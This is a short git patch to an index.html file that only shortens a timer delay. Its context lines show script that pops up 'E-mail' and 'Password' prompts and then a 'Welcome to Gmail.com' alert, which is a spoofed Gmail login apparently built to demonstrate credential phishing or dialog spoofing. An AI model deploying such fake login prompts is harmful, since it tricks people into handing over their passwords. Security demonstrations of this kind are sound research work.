From 64c78e759afcb688dc5d6e1976dee18f09b2b1f6 Mon Sep 17 00:00:00 2001 From: mattreaganmozilla <145381717+mattreaganmozilla@users.noreply.github.com> Date: Fri, 18 Oct 2024 21:03:52 -0700 Subject: [PATCH] Update index.html --- index.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.html b/index.html index 9123287..71a8cac 100644 --- a/index.html +++ b/index.html @@ -16,7 +16,7 @@ x.prompt('E-mail', ''); b = x.prompt('Password', ''); x.alert('Welcome to Gmail.com'); - }, 1000); + }, 500); }